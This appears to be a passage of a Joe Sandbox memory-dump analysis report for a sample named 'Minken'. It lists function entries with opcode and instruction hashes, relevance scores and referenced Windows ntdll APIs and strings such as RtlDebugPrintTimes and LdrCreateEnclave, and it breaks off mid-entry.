Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID:
String ID: @[$#@[$#
API String ID: 0-3745758085
Opcode ID: f5a8abc442d4173fb0b1b21be99d0cfc602ce1067a9f3fdd9265e11d781ff0ad
Instruction ID: a742d2ac2e32ce0e25bffd68be96e3e99a3a0489673b28db095be8274966cf56
Opcode Fuzzy Hash: f5a8abc442d4173fb0b1b21be99d0cfc602ce1067a9f3fdd9265e11d781ff0ad
Instruction Fuzzy Hash: B432C071E00219DBCF14DFA8D890BEEBBB5FF54714F1980A9E905AB381E7359A41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 23151131 Relevance: 1.8, APIs: 1, Instructions: 259timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 23151233

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 8b53e1f694b4fc997a0d3f76099ce5ac4e3918cd22f70261416a551f0081da0b
Instruction ID: ac90baefa987e7ee9af99d90b2ffe3a9ad89548715f0012dbd8d01afb3bde075
Opcode Fuzzy Hash: 8b53e1f694b4fc997a0d3f76099ce5ac4e3918cd22f70261416a551f0081da0b
Instruction Fuzzy Hash: 89B102756093408FD755CF28C980A5AFBE1BF88304F1849AEF999C7352D371EA45CB46

Uniqueness

Uniqueness Score: -1.00%

Function 23157370 Relevance: 1.7, APIs: 1, Instructions: 247COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27d1ce673eb3cc242e31c52d70b5fbebfb17e37d97dad2cef6064d83ebdc89e7
Instruction ID: 90198fd1ede7690fa676ecf54ea6ffd73a2cb7ff9d55a0e8267c81a2bd045ea7
Opcode Fuzzy Hash: 27d1ce673eb3cc242e31c52d70b5fbebfb17e37d97dad2cef6064d83ebdc89e7
Instruction Fuzzy Hash: EBA16971608341CFD320DF28C481A5ABBFABF98314F1589AEF59587351E770EA85CB92

Uniqueness

Uniqueness Score: -1.00%

Function 23157703 Relevance: 1.7, APIs: 1, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f444eb933ac0e1dba295a94d85e67a786faa03d6dbfb4bb96be29515b5dd7a5d
Instruction ID: 467738f6072dd88968ec0959ba53fa194490c2e7f0bf90d10914454ad6b57212
Opcode Fuzzy Hash: f444eb933ac0e1dba295a94d85e67a786faa03d6dbfb4bb96be29515b5dd7a5d
Instruction Fuzzy Hash: A6615371A00605AFDB18DF68C491A9DFBB5FF54200F1582AAE529A7301DB34AB55CFD0

Uniqueness

Uniqueness Score: -1.00%

Function 2318F603 Relevance: 1.6, APIs: 1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1399bb2d882768ec81003df1aa238d996f86094c73e7376ee3cb02a4b136e0ba
Instruction ID: 07e9296da5e63f199d81134f1af88cd9d10cf49fdfee2d900844aa76794a854a
Opcode Fuzzy Hash: 1399bb2d882768ec81003df1aa238d996f86094c73e7376ee3cb02a4b136e0ba
Instruction Fuzzy Hash: 86414CB4D013889FDB14DFA9D880AEDBBF4BF58350F2082AED559A7211D7309A45CF64

Uniqueness

Uniqueness Score: -1.00%

Function 2315262C Relevance: 1.6, APIs: 1, Instructions: 119timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 23152710

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 91ff06c1f29a9366763105857fd53e5dff86a2d02e265828d5cff14c5a7f09e6
Instruction ID: b260a0f3331adcddccb80bd4abf29af3b56f9c194abe41f07031fa92a73e0425
Opcode Fuzzy Hash: 91ff06c1f29a9366763105857fd53e5dff86a2d02e265828d5cff14c5a7f09e6
Instruction Fuzzy Hash: FA41C272912704CFC769EF64C940A49B7B5FF64310F1581E9E5259B2A1DB309B82CF91

Uniqueness

Uniqueness Score: -1.00%

Function 231D07C3 Relevance: 1.6, APIs: 1, Instructions: 114timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 231D083C

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: c9a48faafe3d1d409409189426f14468b3623f17854ad70a97dd2e5e5f42108d
Instruction ID: 30c5803b7a8d600240e254dfa33ea5d786425d1c211b911b82fe8a64a9a1975f
Opcode Fuzzy Hash: c9a48faafe3d1d409409189426f14468b3623f17854ad70a97dd2e5e5f42108d
Instruction Fuzzy Hash: 6641BE729043049FD360DF28C844B9BBBE8FF88614F008A6EF698C7251D770DA04CB92

Uniqueness

Uniqueness Score: -1.00%

Function 231557C0 Relevance: 1.6, APIs: 1, Instructions: 92timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 23155842

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: bb9c7413c5396561452239068992b0833bf59ca4796e7495910f8ff6fdcb40e4
Instruction ID: e2cfc560d29481cb6df86bc6f7ca04ad80879fe90f8ac998a1e650e08ec8cd0a
Opcode Fuzzy Hash: bb9c7413c5396561452239068992b0833bf59ca4796e7495910f8ff6fdcb40e4
Instruction Fuzzy Hash: DD31AC35A15A09FFD7519B24CE90E89BBA6FF94210F4490A9E92187B61D731EA70CB80

Uniqueness

Uniqueness Score: -1.00%

Function 23153616 Relevance: 1.6, APIs: 1, Instructions: 84timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 231536A1

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: bd8f93fa59e4da9477f1e5405abd715fcc0b7d169ef177abba51a103d8b87e5a
Instruction ID: cfa0922061ffa559407c0aeff5e77efb1b44bb7c83a0228a2821592f3bac58f5
Opcode Fuzzy Hash: bd8f93fa59e4da9477f1e5405abd715fcc0b7d169ef177abba51a103d8b87e5a
Instruction Fuzzy Hash: A92126316063509FC761AF44CA98B9ABBA4FF80B10F0508EDFA644BA51C770EB44CF91

Uniqueness

Uniqueness Score: -1.00%

Function 231492FF Relevance: 1.5, APIs: 1, Instructions: 35timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 23149325

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 692ed9a0c90a5bd170060b9bb151daeddc03d148a809884a36d192184aea8ca1
Instruction ID: 2d32a30dae98b0659f797e66bbbc7c75079b8b42f0cf7c29f97f1bf8a25e2d68
Opcode Fuzzy Hash: 692ed9a0c90a5bd170060b9bb151daeddc03d148a809884a36d192184aea8ca1
Instruction Fuzzy Hash: 24F0F032200340ABC731AB59CC04F8ABBFDEF95B10F080599B64693090D6A0FA05C650

Uniqueness

Uniqueness Score: -1.00%

Function 2318A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

GlobalTags, xrefs: 231C67C9

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID:
String ID: GlobalTags
API String ID: 0-1106856819
Opcode ID: 0e23ea088ab4d3f607fc3bf4e810ca5109b9f85e3355e1f6298f7bc5f1c79e34
Instruction ID: 783cc3e7e5a681d37788caf11560660421dea20a3a916271e2c0db623db9ac70
Opcode Fuzzy Hash: 0e23ea088ab4d3f607fc3bf4e810ca5109b9f85e3355e1f6298f7bc5f1c79e34
Instruction Fuzzy Hash: BF71AF75E0035ACFDF18DF98C890ADDBBB1BF68700F1889AEE905A7245D7348A41CB55

Uniqueness

Uniqueness Score: -1.00%

Function 2315973A Relevance: 1.4, Strings: 1, Instructions: 191COMMON

Download Yara Rule

Strings

@, xrefs: 231597F3

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
Instruction ID: 06f5a9bdacd406c9b4bdf560c5f46dd3cce8aeb0b9caf2405ce7b54ab9d2628a
Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
Instruction Fuzzy Hash: B1619971D0121CABDB21DFA5C840BDEBBF9FF80710F1441AAE920A7294D7748B42CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 231DF7AF Relevance: 1.4, Strings: 1, Instructions: 161COMMON

Download Yara Rule

Strings

@, xrefs: 231DF867

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
Instruction ID: 8488f1d0839a3a5244deda3431fca9bc925e7af8cfea8139b4ed185a46045315
Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
Instruction Fuzzy Hash: AB51BE72504309AFE7219F54C840FABB7E8FB85750F0409A9BA8097290D7B4EF14CB96

Uniqueness

Uniqueness Score: -1.00%

Function 2316E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON

Download Yara Rule

Strings

EXT-, xrefs: 2316E6A4

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID:
String ID: EXT-
API String ID: 0-1948896318
Opcode ID: 007071fc2d011f1c8f87122959d4f9dcffe0493bbb07bc0fb9f6afce71ef319e
Instruction ID: b57c40381a1591fdfa2c162735c1b2212628001fb92927707b9bb1494f021385
Opcode Fuzzy Hash: 007071fc2d011f1c8f87122959d4f9dcffe0493bbb07bc0fb9f6afce71ef319e
Instruction Fuzzy Hash: 8C4192725193119BD720DBB5CA40B9BB7E8AF88B04F050AA9F684D7180E774CB54CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 2320B256 Relevance: 1.4, Strings: 1, Instructions: 130COMMON

Download Yara Rule

Strings

PreferredUILanguages, xrefs: 2320B28F

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID:
String ID: PreferredUILanguages
API String ID: 0-1884656846
Opcode ID: 060f2775a18be3ee996bdc8dcdd6cd691f54effccf742cebbaa98415e69d7503
Instruction ID: 27e854fbda7198a6709c1d111bf967f92cb526dab0acac2810ccca26834c19c8
Opcode Fuzzy Hash: 060f2775a18be3ee996bdc8dcdd6cd691f54effccf742cebbaa98415e69d7503
Instruction Fuzzy Hash: 0141A632D00219ABDF21DBA4CC40FEE77B9AF54750F1501E6EA11E7250E6B0DE84C7A4

Uniqueness

Uniqueness Score: -1.00%

Function 231CC730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

BinaryHash, xrefs: 231CC77F

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: bf144d2d781c192758a171797d3d159d7a1f5ae52f799cfbb1f3c4b8030141f8
Instruction ID: 3ce651e6a38708b66a69401c23c963d0f84613586d00e839f68772f019d42c9b
Opcode Fuzzy Hash: bf144d2d781c192758a171797d3d159d7a1f5ae52f799cfbb1f3c4b8030141f8
Instruction Fuzzy Hash: 824173B1D0126CABDB60CB50CC80FDE777CAB55714F0045E5AA18AB150DB709F89CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 231D97A9 Relevance: 1.4, Strings: 1, Instructions: 121COMMON

Download Yara Rule

Strings

verifier.dll, xrefs: 231D9870

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID:
String ID: verifier.dll
API String ID: 0-3265496382
Opcode ID: 504f4b130c0f4d102a6eaa283f9ad585fc19e4b89a67c6cf1433b17abdfe7bd2
Instruction ID: 5bbfb28d0bba36f1de6e38373b5c69df1446801dbd796619a97cb2b5aaed0e02
Opcode Fuzzy Hash: 504f4b130c0f4d102a6eaa283f9ad585fc19e4b89a67c6cf1433b17abdfe7bd2
Instruction Fuzzy Hash: 9C31D872B003099FD714EF689850B6677F9EB5AB14F6480BAE644DF289E7318E80C794

Uniqueness

Uniqueness Score: -1.00%

Function 23155096 Relevance: 1.3, Strings: 1, Instructions: 71COMMON

Download Yara Rule

Strings

Actx , xrefs: 231550BF

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: ce586498a662aec508d6e5a5bf1c9e32c6dcb81fe3dcc2f6be76afdd4faaae99
Instruction ID: 160e82e8e9a2ad033c76401868f76910c40bed13985eb5a8b7cf857cd99fda7b
Opcode Fuzzy Hash: ce586498a662aec508d6e5a5bf1c9e32c6dcb81fe3dcc2f6be76afdd4faaae99
Instruction Fuzzy Hash: 0A11B6323056028FD7145B198890A96B7D9FB85264F3A81AAF5B3CF391D671DF818384

Uniqueness

Uniqueness Score: -1.00%

Function 231D106E Relevance: 1.3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

Strings

LdrCreateEnclave, xrefs: 231D10F7

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID:
String ID: LdrCreateEnclave
API String ID: 0-3262589265
Opcode ID: 5e1f3222c7399b8ab2b79c20726ac5c3add94dacf545a0eb52f0ecedcd0e518c
Instruction ID: d1cd92a96eb0afa811000bb0fac6ff4fb38bbcb7578487e72b88d9ba9a03be23
Opcode Fuzzy Hash: 5e1f3222c7399b8ab2b79c20726ac5c3add94dacf545a0eb52f0ecedcd0e518c
Instruction Fuzzy Hash: 0A2118B29183449FC350DF6AD844A5BFBE8BBE6B10F004A6EF69097250D7B0D605CB92

Uniqueness

Uniqueness Score: -1.00%

Function 231A739A Relevance: .7, Instructions: 705COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c993293d097c6369377f613be81b64388353a8f52a8018be9bf83b2e9c69d74
Instruction ID: 3829b247234f0deea1d239f945091ae6700ad99e5057b8f7c7f21861c19b47a2
Opcode Fuzzy Hash: 1c993293d097c6369377f613be81b64388353a8f52a8018be9bf83b2e9c69d74
Instruction Fuzzy Hash: B842C275A006168FDB08DF9DC8A0AAEB7B6FF88311B18859DD551AB341D730EB42CB90

Uniqueness

Uniqueness Score: -1.00%

Function 231E8158 Relevance: .6, Instructions: 617COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37c0d89ffe98cfe8aae5b20eefacba3d65161065fdee003753b8988155f1c2dd
Instruction ID: f2b936fdadc256a896979f9ab7401a029a9fc40a788ee508a5419d55be252792
Opcode Fuzzy Hash: 37c0d89ffe98cfe8aae5b20eefacba3d65161065fdee003753b8988155f1c2dd
Instruction Fuzzy Hash: 20424975A006198FDB24CF69C881BEDB7F5BF88700F1981D9E94DAB242D7359A81CF60

Uniqueness

Uniqueness Score: -1.00%

Function 23148397 Relevance: .4, Instructions: 380COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e33191ba02f6d8c0dccc9060ceb483bd1780156ecd44797a9f88761db8a741c
Instruction ID: a2e90b61d46c03e733320a0c51a61e71369f0dcf3ffdf1f86cab57f2ba317625
Opcode Fuzzy Hash: 2e33191ba02f6d8c0dccc9060ceb483bd1780156ecd44797a9f88761db8a741c
Instruction Fuzzy Hash: CBD10175E0039A9BCB14DF29C890EAA73B5BF54305F0982ADEA15DB281E731DB41CB60

Uniqueness

Uniqueness Score: -1.00%

Function 2315D7E0 Relevance: .3, Instructions: 342COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9afc69e96a7fc2ea8e9f9dc78d0836125d4fbf899799954afd6af64de72485d
Instruction ID: e61e55c28e454534114b09c57582e036b91db21b8bf3916fb3e2b02c99c18ba5
Opcode Fuzzy Hash: d9afc69e96a7fc2ea8e9f9dc78d0836125d4fbf899799954afd6af64de72485d
Instruction Fuzzy Hash: E4C1B271F012169FDB14DF59C841BDEB7B6EF64310F19C2E9E924AB281DB70AA41CB84

Uniqueness

Uniqueness Score: -1.00%

Function 231D8243 Relevance: .3, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
Instruction ID: ea00e62875d770f43d4039b6dfd3f03018615a155c5dc8cd7ecd2b7f36ac1311
Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
Instruction Fuzzy Hash: A6B1C176A0070DAFDB24DF95C940EABB7B9FF89714F1444ADAA0297690DB34EB05CB10

Uniqueness

Uniqueness Score: -1.00%

Function 231790DB Relevance: .3, Instructions: 287COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2939582953.0000000023120000.00000040.00001000.00020000.00000000.sdmp, Offset: 23120000, based on PE: true

Associated: 0000000C.00000002.2939582953.0000000023249000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.000000002324D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2939582953.00000000232BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_23120000_Minken.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c0e1f7000c335e54fe60e25c7b754c3e70dd952f6676d958f8cceb31bc9fbdb
Instruction ID: 245ddcea34ab9adf989c13e41ad8eb23b9c4ce913cf23e2e346987b52322ad49
